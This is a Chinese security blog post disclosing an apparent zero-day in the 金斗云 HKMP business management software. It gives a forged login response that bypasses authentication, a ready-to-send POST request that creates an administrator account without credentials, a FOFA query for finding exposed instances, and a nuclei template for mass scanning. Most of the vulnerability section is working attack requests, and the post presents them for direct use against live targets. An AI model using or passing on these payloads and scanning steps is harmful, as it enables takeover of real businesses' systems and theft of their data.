【0day】金斗云HKMP智慧商业软件

发布于 作者:

【0day】金斗云HKMP智慧商业软件

原创 shuxi 黑白防线 2024-07-04 19:24

作者 | 书汐

一、金斗云HKMP智慧商业软件介绍:

金斗云智慧商业软件是一款功能强大、易于使用的智慧管理系统,通过智能化的管理工具,帮助企业实现高效经营、优化流程、降低成本,并提升客户体验。

二、漏洞描述:

01.逻辑漏洞:

登录时输入任意用户,然后抓包替换返回包如下即可登录后台 

HTTP/1.1 200 
Content-Type: application/json
Date: Tue, 25 Jun 2024 15:22:37 GMT
Connection: close
Content-Length: 205

{"code":"1000","message":"成功","data":{"userCode":"admin","userName":"系统管理员","level":"*","privilege":"*","version":"1.0.138.387","companyName":"","logo":"","expiryTime":"2034-03-20 00:00:00"}}

02.任意用户创建:

直接发送下面数据包**** 

POST /admin/user/add HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate

{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067,"nonce":5223015867,"sign":"hkmp","data":{"userCode":"root1234","userName":"root1234","password":"123456","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}}

三、漏洞复现:

01.fofa语句 

title=="金斗云"

02.逻辑漏洞

打开目标网址,随意输入账号密码点击登录进行抓包

替换响应包

成功登录

02.任意用户创建

直接向目标发送pyload即可****

03.nuclei 批量扫描poc

记得更改里面的用户名哦 

id: HKMP-logical-vulnerability

info:
  name: WebFuzzer Template kaUGtMby
  author: god
  severity: high
  description: write your description here
  reference:
  - https://github.com/
  - https://cve.mitre.org/
  metadata:
    max-request: 1
    shodan-query: ""
    verified: true

http:
- method: POST
  path:
  - '{{RootURL}}/admin/user/add'
  headers:
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-Length: "251"
    Content-Type: application/json;charset=UTF-8
    Origin: http://121.29.1.125:8090
    Priority: u=1
    Referer: http://121.29.1.125:8090/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101
      Firefox/127.0
    X-Requested-With: XMLHttpRequest
  body: '{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067,"nonce":5223015867,"sign":"hkmp","data":{"userCode":"fuckyou2","userName":"fuckyou2","password":"fuckyou2","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}}'

  max-redirects: 3
  matchers-condition: and
  matchers:
    - type: status
      status:
        - 200
    - type: word
      part: body
      words:
        - "成功"

-END-

喜欢就点个关注吧~                     

往期文章:

SSH-RCE(CVE-2024-6387)

web安全之登录框渗透骚姿势

Cobalt_Strike(CS)安装到免杀上线

ARL灯塔魔改,自动化资产搜集+漏扫+推送+1W加指纹

Windows权限提升方式总结

喜欢这篇文章记得「点赞
+在看」
哟****